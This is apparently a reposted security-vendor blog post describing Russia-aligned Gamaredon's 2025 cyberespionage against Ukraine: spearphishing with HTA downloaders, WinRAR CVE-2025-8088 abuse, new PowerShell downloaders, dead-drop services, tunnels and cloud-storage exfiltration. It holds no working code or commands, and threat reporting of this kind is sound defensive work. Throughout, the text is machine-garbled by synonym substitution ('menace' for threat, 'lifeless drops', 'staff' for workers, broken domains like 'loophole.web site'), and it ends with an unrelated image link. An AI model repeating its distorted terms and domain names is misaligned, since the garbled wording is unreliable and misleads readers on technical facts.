Cyberespionage has remained a relentless function of Russia’s struggle in opposition to Ukraine. ESET Analysis has lengthy tracked Gamaredon, one of the crucial energetic Russia-aligned superior persistent menace (APT) teams focusing on Ukraine. The group, attributed by the Safety Service of Ukraine (SSU) to the 18th Middle of Data Safety of Russia’s FSB, maintained a excessive operational tempo all through 2025.
In our newest analysis, we analyze Gamaredon’s exercise throughout 2025, together with new instruments added to its arsenal, vital shifts in the way it protects its community infrastructure, and its rising use of reputable third-party providers to cover each command and management (C&C) info and stolen knowledge. The total technical particulars can be found in our newest white paper.
Key factors of this blogpost:
- All through 2025, Gamaredon solely focused governmental and army establishments in Ukraine.
- We noticed 35 distinct spearphishing campaigns in opposition to new targets. The vast majority of the campaigns have been carried out within the second half of the yr, and so they have been considerably bigger than earlier ones.
- Further targets have been compromised through a number of customized weaponizers designed for lateral motion.
- Gamaredon operators developed and deployed six new malicious PowerShell instruments, which we analyze in our white paper, and resurrected an previous VBScript weaponizer – PteroSetup.
- The file stealers PteroVDoor and PteroPSDoor have been upgraded to help exfiltration to cloud storage providers (Wasabi, Tebi, and Intercolo), which grew to become the first exfiltration technique.
- Gamaredon operators sought new methods to guard their community infrastructure, with their C&C servers now hidden behind numerous third-party providers comparable to tunnels, staff, DDNS (dynamic DNS), and PaaS (platform as a service).
- In addition they abused a number of reputable messaging, social media, running a blog, and paste providers as lifeless drops for resolving C&C servers and distributing payloads.
The white paper is our third in-depth installment describing the techniques, strategies, and procedures (TTPs) of this group, which is believed to function out of occupied Crimea. In September 2024, we revealed a white paper overlaying Gamaredon actions from 2022 and 2023 – Cyberespionage the Gamaredon approach: Evaluation of toolset used to spy on Ukraine in 2022 and 2023 – and in July 2025, we revealed a white paper overlaying Gamaredon actions from 2024 – Gamaredon in 2024: Cranking out spearphishing campaigns in opposition to Ukraine with an developed toolset.
Continued knowledge exfiltration and a brand new alliance
All through 2025, Gamaredon stayed extremely energetic and remained targeted solely on Ukraine. The group’s final objective continues to be the exfiltration of delicate info and different crucial knowledge that may very well be exploited to help Russian pursuits within the ongoing struggle in Ukraine. Gamaredon’s actions look like intently aligned with Russia’s geopolitical goals, focusing on Ukrainian governmental and army establishments to realize an intelligence benefit.
New tooling and cooperation within the first half of the yr
Whereas the group took a brief operational break in January 2025, Gamaredon spent a lot of its effort within the first half of the yr growing and deploying new instruments. We describe them within the Six new instruments, principally delivery-focused part of this blogpost. Whereas we don’t present the precise timestamps for all modifications launched to the group’s tooling, we noticed that many updates have been made within the lead-up to main holidays in Russia and Crimea. Notably, no updates have been noticed throughout or instantly after these holidays, additional suggesting that Gamaredon operators are in all probability government-affiliated workers.
Notably, we uncovered that in early 2025, Gamaredon collaborated with Turla, one other Russia-aligned menace actor additionally linked to the FSB; we documented our findings in our blogpost Gamaredon X Turla collab. This cooperation underscores the potential for coordinated cyberespionage campaigns amongst Russia-aligned teams, prone to amplify their operational influence. Previously, Gamaredon additionally collaborated with a menace actor that we found and named InvisiMole.
Extra broadly, 2025 additionally offered one other instance of cooperation and job sharing amongst Russia-aligned actors: we noticed the Russia-aligned UAC-0099 group conducting preliminary entry operations and subsequently transferring validated targets to Sandworm for follow-up exercise. We documented our findings in ESET APT Exercise Report Q2 2025–Q3 2025.
Bigger and extra frequent spearphishing campaigns within the second half
Within the second half of the yr, the group shifted extra towards bigger and extra frequent spearphishing campaigns; throughout 2025, we recognized 35 of those. As in earlier years, most campaigns used archive attachments or XHTML information using HTML smuggling to ship malicious HTA downloaders, which in flip fetched the VBScript downloader PteroSand and extra payloads. We additionally noticed campaigns that in all probability used malicious hyperlinks as an alternative of attachments.
Determine 1 reveals a chart of distinctive samples of HTA downloaders delivered monthly in Gamaredon spearphishing campaigns. Notice that these figures signify minimums for spearphishing makes an attempt, as one HTA downloader could goal a number of people, and people might be focused in a number of campaigns throughout the similar month.
What modified most noticeably was the tempo. Gamaredon was way more energetic within the second half of the yr, when campaigns grew to become each extra frequent and bigger in scale. Late within the yr, the group additionally launched a brand new method – from September 26th, 2025 onward, it started abusing CVE-2025-8088, a WinRAR vulnerability, to put its standard malicious HTA downloader into the sufferer’s Startup folder. That allowed the downloader to execute on the following login, including persistence to a compromise chain that had beforehand relied extra closely on person interplay.
Weaponizers for motion past the compromised system
Past spearphishing, Gamaredon additionally continued utilizing customized weaponizers for lateral motion. These instruments weaponize USB drives, mapped community drives, and even software program installers, serving to the group unfold inside or throughout organizations after the preliminary compromise.
Six new instruments, principally delivery-focused
Gamaredon launched six new instruments in 2025, all written in PowerShell. 5 of them appeared within the first quarter of the yr, suggesting that the group spent the early months of 2025 constructing new supply chains earlier than shifting extra consideration to large-scale spearphishing within the second half.
Most of those new instruments are comparatively easy:
- PteroDee and PteroCache are easy PowerShell downloaders for fetching and executing PowerShell payloads in reminiscence.
- PteroDum serves the same function, however for VBScript payloads, writing them briefly to disk, executing them, after which deleting them.
- PteroOdd is a tiny downloader used to retrieve a single PowerShell payload through the Telegra.ph API, and primarily based on what we noticed, it seems to have been used primarily in circumstances related to Gamaredon’s collaboration with Turla.
- PteroEffigy is one other light-weight downloader, notable primarily for utilizing the GoFile cloud storage service to acquire the following C&C server.
The standout among the many new instruments is PteroPaste, which is significantly extra complicated than the others. It combines a downloader, a USB weaponizer, and a runner element used for persistence and orchestration. Early variations of PteroPaste used Rentry as an middleman staging level for encrypted payloads. Later variations moved away from that strategy and as an alternative retrieve an encrypted C&C hostname from Dropbox, decrypt it domestically, after which connect with infrastructure hidden behind tunnel providers. PteroPaste can be one of many instruments concerned within the Gamaredon X Turla collaboration that we documented in 2025.
Gamaredon additionally introduced again PteroSetup, an older VBScript weaponizer that had probably been discontinued years earlier. The resurrected model scans mounted, detachable, and community drives for installer-like executable information and replaces them with malicious self-extracting archives containing each the unique installer and a malicious VBScript downloader. To the sufferer, the file nonetheless seems reputable, however working it launches each the anticipated installer and the malicious code.
General, the brand new additions to Gamaredon’s arsenal match a sample that we’ve got seen earlier than – reasonably than investing in extremely refined malware, the group prefers a bigger variety of easy instruments that may be up to date rapidly and mixed flexibly.
Essential updates to beforehand identified instruments comparable to PteroLNK, PteroPSLoad, PteroPSDoor, PteroVDoor, and PteroBox might be discovered within the white paper.
Superior community infrastructure
Gamaredon continued to refine its strategies for shielding its community infrastructure and hiding its C&C servers. In 2025, the group’s reliance on third-party providers grew considerably, with tunnel providers and serverless employee platforms changing into an more and more essential a part of the way it hid its actual back-end infrastructure.
Tunnel providers are reputable instruments that enable a system or software to be uncovered to the web by a provider-controlled area, with out revealing the true server immediately. Employees serve the same function, however go a step additional: as an alternative of merely forwarding site visitors, they’re serverless platforms that may run code and course of requests earlier than passing them on. In observe, each assist obscure the underlying infrastructure and make disruption harder.
Tunnels, staff, and a return to DDNS
By the tip of 2024, Gamaredon was already relying closely on Cloudflare tunnels (trycloudflare.com) to hide its infrastructure, and in 2025 it expanded that strategy additional. In Might, we started seeing the group cover C&C servers behind Cloudflare staff (staff.dev), and in June it added Microsoft’s devtunnels.ms and Loophole (loophole.web site). These providers have been usually used collectively, with one appearing as the first communication path and others serving as fallbacks.
In a number of remoted circumstances, we additionally noticed experiments with different tunnel providers, comparable to loca.lt and bore.pub, however these didn’t seem to develop into a part of the group’s common toolkit.
Gamaredon additionally returned to a way that had as soon as been a hallmark of its operations: dynamic DNS (DDNS). After a number of years of relying extra closely on registered domains, the group once more started utilizing No-IP domains throughout a number of instruments, particularly in HTA downloaders delivered in spearphishing campaigns. In parallel, we noticed Gamaredon abuse platform-as-a-service choices from Intelligent Cloud (cleverapps.io) and Supabase (supabase.co) in a number of campaigns, suggesting that the group remains to be actively searching for low-cost, disposable infrastructure that blends in with reputable site visitors.
Leveraging an previous espionage idea: Lifeless drops
One of the crucial essential points of Gamaredon’s 2025 operations was its heavy use of so-called dead-drop providers. The time period comes from conventional espionage – as an alternative of assembly immediately, one operative leaves info in a public or hidden location and one other retrieves it later. On-line, the precept is comparable. Slightly than embedding the true malicious server immediately in malware, operators place that info on a reputable web site or platform, and the malware retrieves it from there. Because of this the malware could first contact a public web page on a reputable service, learn a hidden or staged worth from it, and solely then connect with the precise C&C server.
This strategy provides attackers a number of benefits. It makes their operations extra versatile, as a result of they will swap servers rapidly. It additionally complicates blocking, as a result of defenders could also be reluctant to dam reputable and broadly used providers outright.
In 2025, Gamaredon abused quite a few providers on this approach: Telegram channels (through t.me; Telegram’s official URL shortener service), posts on the Telegra.ph (telegra.ph) and Teletype (teletype.in) platforms, rentry.co, write.as, Dropbox, GoFile, social networks DEV Neighborhood (dev.to) and Mastodon (mastodon.social), lesma (lesma.eu), nopaste.web, and Paste.ee (pastee.dev). In some circumstances, these providers have been used to publish up to date C&C info. In others, they have been used to ship payloads or cloud-storage configuration knowledge.
In comparison with 2024, we additionally noticed a shift in how Gamaredon used these lifeless drops. Slightly than merely publishing uncooked C&C IP addresses, operators more and more used them to level malware to infrastructure already hidden behind tunnels or staff. In different phrases, the lifeless drop usually now not revealed the true server immediately; as an alternative, it pointed to a different intermediate layer.
Cloud storage grew to become the popular exfiltration channel
The opposite main infrastructure shift we noticed was on the data-exfiltration aspect. Gamaredon upgraded two of its flagship file stealers, PteroPSDoor and PteroVDoor, to add stolen information to S3-compatible cloud storage providers – suppliers that help the Amazon S3 API, permitting the identical instruments and code to work throughout totally different storage distributors. Over the course of the yr, configurations moved from Wasabi (wasabisys.com) to Tebi (tebi.io) after which to Intercolo (de-fra.i3storage.com), which by December had develop into the first exfiltration vacation spot.
On the similar time, PteroBox continued to add information to Dropbox, and one newer variant used the rclone utility to take action.
Importing stolen information to cloud storage reduces the necessity for Gamaredon to keep up its personal infrastructure for receiving giant quantities of stolen knowledge. It additionally helps malicious site visitors mix in with entry to reputable storage suppliers. Primarily, Gamaredon more and more makes use of third-party providers not solely to cover the place directions come from, but in addition to cover the place stolen knowledge goes.
Conclusion
Gamaredon continued to focus its cyberespionage exercise solely on Ukraine all through 2025, and nothing in ESET telemetry means that this can change within the close to future.
Whereas the six new instruments launched in 2025 have been, for essentially the most half, easy downloaders, the extra essential growth was the continued evolution of the infrastructure supporting the group’s operations. Gamaredon additional expanded its use of lifeless drops, tunnels, staff, dynamic DNS, and cloud storage, making its operations extra versatile and more durable to disrupt.
As in earlier years, the group compensated for the relative simplicity of its malware with persistence, frequent updates, and an more and more artistic abuse of reputable on-line providers. So long as Russia’s struggle in opposition to Ukraine continues, we count on Gamaredon to stay a big cyberespionage menace to Ukrainian establishments.
IoCs
A complete listing of indicators of compromise (IoCs) might be present in our GitHub repository and the Gamaredon white paper.
![How creators and entrepreneurs are utilizing AI to hurry up & succeed [data]](https://blog.aimactgrow.com/wp-content/uploads/2025/06/Untitled20design-Apr-07-2023-08-24-35-4586-PM-120x86.png)
